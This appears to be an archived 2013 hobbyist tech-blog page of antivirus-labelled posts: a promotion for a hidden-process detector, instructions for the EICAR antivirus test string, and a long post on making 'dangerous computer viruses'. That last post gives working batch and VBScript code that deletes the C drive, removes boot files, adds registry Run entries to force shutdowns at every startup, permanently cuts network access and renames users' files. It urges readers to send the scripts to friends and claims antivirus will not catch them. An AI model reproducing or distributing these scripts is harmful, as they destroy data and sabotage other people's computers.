Introductory Video

Showing posts with label Antivirus. Show all posts
Showing posts with label Antivirus. Show all posts

Wednesday, 25 September 2013

, , , , ,

Detect Hidden Trojans, Viruses, Keyloggers on Your Computer.Download Process Revealer

Detect Hidden Trojans, Viruses, Keyloggers on Your PC


Hi Guys.Are you Worry that there is a hidden Trojan, Virus or Keylogger working on your computer and sending your Data Or Passwords to hackers?Now you don't need to worry about it.Today i give you a security software"Process Revealer"that can detect and kill hidden Viruses keyloggers processes.Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program.To Download This Free Tool click on below link.

Download
 
Download
 
How To Use  Process Revealer
 
Download Process Revealer From Above link And run as Administrator.
 
 
 
Then You show many tasks are running in Process Revealer.If you think this is a keylogger or virus right click on it and delete or end this task Like shown Below




, , , , ,

Detect Hidden Trojans, Viruses, Keyloggers on Your Computer.Download Process Revealer

Detect Hidden Trojans, Viruses, Keyloggers on Your PC


Hi Guys.Are you Worry that there is a hidden Trojan, Virus or Keylogger working on your computer and sending your Data Or Passwords to hackers?Now you don't need to worry about it.Today i give you a security software"Process Revealer"that can detect and kill hidden Viruses keyloggers processes.Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program.To Download This Free Tool click on below link.

Saturday, 6 July 2013

, , ,

Check Your Antivirus Working Perfect ?

Antivirus


Hi Guys.Today i tell you Amazing trick.This trick will let you Detect that your Antivirus software is working Prefect or not.We will create a file which every antivirus sofware will Detect as virus but Don't worry it is Harmless and will not harm your computer.it's only for check your antivirus is work proper or not.It's just a exe file.
Lets Start:
1. Open Notepad.


2. Past below code in it.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3. Save file as a virus.exe

4. After some time if your antivirus detect this file as a virus your antivirus work perfect If not then you need to change your anti virus program
, , ,

Check Your Antivirus Working Perfect ?

Antivirus


Hi Guys.Today i tell you Amazing trick.This trick will let you Detect that your Antivirus software is working Prefect or not.We will create a file which every antivirus sofware will Detect as virus but Don't worry it is Harmless and will not harm your computer.it's only for check your antivirus is work proper or not.It's just a exe file.
Lets Start:

Saturday, 29 June 2013

, , , , ,

How To Make Dangerous Computer Virus ? 10 Most Famous Computer Viruses Codes

Dangerous Computer Virus


Hi Guys.Today i tell you how to make simple yet very powerful or you can say Harmful computer virus using a batch file.No software is required to make this Dangerous Computer virus, Notepad is enough for it. The good thing about this virus that is not detected by any AntiVirus.Therefor you can easly make this and use it any computer.You will create this virus using batch file programming. This virus will Delete the C Drive completely.
Lets Start.

1. Open Notepad ( Go to start > click on run > write notepad )
2. Now Copy below code in notepad

@Echo off
Del C:\ *.* |y

3. S
ave this file as Virus.bat

4. N
ow, running this file will delete all the content of C Drive.


Some New Viruses Codes


0.Convey your friend a little message and shut down his / her computer:


@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it. 

1.Toggle your friend's Caps Lock button simultaneously:


Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

2.Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :


Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

3.This Virus Deletes All The Content Of C Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat 


4.This Will Crash your Computer
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs 
 

5.The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat 

6.Virus that crashes pc

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


7.Shutdowns Computer Everytime It Is Turned On


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


8.Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


Save As Anything.bat

 
9.Change Files To Non-working TXT Files
Save As A bat File


REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


10.System Meltdown


:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE


Save As Anything.bat



11.Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

Note:

Please don't try to run on your own computer. it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer
.
, , , , ,

How To Make Dangerous Computer Virus ? 10 Most Famous Computer Viruses Codes

Dangerous Computer Virus


Hi Guys.Today i tell you how to make simple yet very powerful or you can say Harmful computer virus using a batch file.No software is required to make this Dangerous Computer virus, Notepad is enough for it. The good thing about this virus that is not detected by any AntiVirus.Therefor you can easly make this and use it any computer.You will create this virus using batch file programming. This virus will Delete the C Drive completely.
Lets Start.